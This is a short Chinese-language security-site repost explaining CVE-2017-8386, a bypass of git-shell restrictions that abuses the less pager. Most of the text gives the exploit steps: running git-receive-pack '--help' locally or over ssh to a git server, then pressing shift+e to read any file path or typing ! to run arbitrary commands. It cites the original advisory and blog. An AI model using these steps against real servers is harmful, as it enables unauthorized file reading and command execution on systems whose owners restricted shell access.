Git Shell Bypass-华盟网

Git Shell Bypass

华盟学院山东省第二期线下学习计划

通过git读文件:

git-receive-pack '--help' #本地

ssh git@remoteserver "git-receive-pack '--help'" #远程服务器

打开以后按shift+e,然后输入要读的文件路径

2017051109004b08e7df-b09f-413e-9f52-acaf5ff9ee51.gif

通过git执行命令:

git-receive-pack '--help' #本地

ssh git@remoteserver "git-receive-pack '--help'" #远程服务器

输入!后输入要执行的命令:

123.gif

详情:https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

 

文章出处:Evi1cg's blog   

www.idc126.com

原文链接:https://evi1cg.me/archives/CVE_2017_8386.html

 

本文由 华盟网 作者:AlexFrankly 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

5

发表评论